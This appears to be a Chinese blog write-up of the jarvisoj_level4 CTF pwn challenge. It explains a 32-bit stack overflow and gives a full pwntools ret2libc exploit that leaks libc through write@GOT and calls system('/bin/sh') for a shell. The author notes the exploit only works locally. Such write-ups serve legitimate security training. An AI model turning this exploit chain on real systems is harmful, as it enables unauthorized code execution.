jarvisoj_level4

• 32位libc泄露
• ret2libc

1. 存在漏洞函数vulnerable_function变量buf存在溢出
2. 常规32位泄露libc

from pwn import *
io = process('./level4')
#context.log_level = 'debug'
elf = ELF('./level4')
Lib = ELF('/lib/i386-linux-gnu/libc.so.6')
#io = gdb.debug('./level4','break vulnerable_function')
padding = b'A'*(0x88+0x4)
payload1 = padding+p32(elf.plt['write'])+p32(elf.sym['vulnerable_function'])+p32(0x1)+p32(elf.got['write'])+p32(0x4)
io.send(payload1)
write_addr = u32(io.recv(4))
print('write_addr->',hex(write_addr))

Liboffset = write_addr - Lib.sym['write']
sys_addr = Liboffset + Lib.sym['system']
bin_sh_addr = Liboffset + next(Lib.search(b'/bin/sh'))
payload2 = padding + p32(sys_addr) + p32(0) + p32(bin_sh_addr)
io.send(payload2)
io.interactive()

不知道为什么,本地打通了但是远程泄露的libc有点问题,打不通,还是菜

本栏目推荐文章
• 《RAPL: A Relation-Aware Prototype Learning Approach for Few-Shot Document-Level Relation Extraction》阅读笔记
• 《An End-to-end Model for Entity-level Relation Extraction using Multi-instance Learning》阅读笔记
• jarvisoj_level4
• Lab 1-Vulnhub - Kioptix Level 1
• 逆向通达信Level-2 续十一 (无帐号登陆itrend研究版)
• 《A Novel Table-to-Graph Generation Approach for Document-Level Joint Entity and Relation Extraction》阅读笔记
• jarvisoj_level3_x64
• jarvisoj_level3
• Python - pandas 报错：ValueError: 'HIS_批准文号' is both an index level and a column label, which is ambiguous.
• [论文阅读] Learning Component-Level and Inter-Class Glyph Representation for few-shot Font Generation

jarvisoj_level jarvisoj leveljarvisoj_level jarvisoj level jarvisoj_level jarvisoj_level jarvisoj level 64 jarvisoj_level jarvisoj level pwn jarvisoj_level buuct_pwn jarvisoj buuct jarvisoj_level jarvisoj buuctf level jarvisoj jarvisoj_fm pwn-jarvisoj_fm jarvisoj_fm jarvisoj fm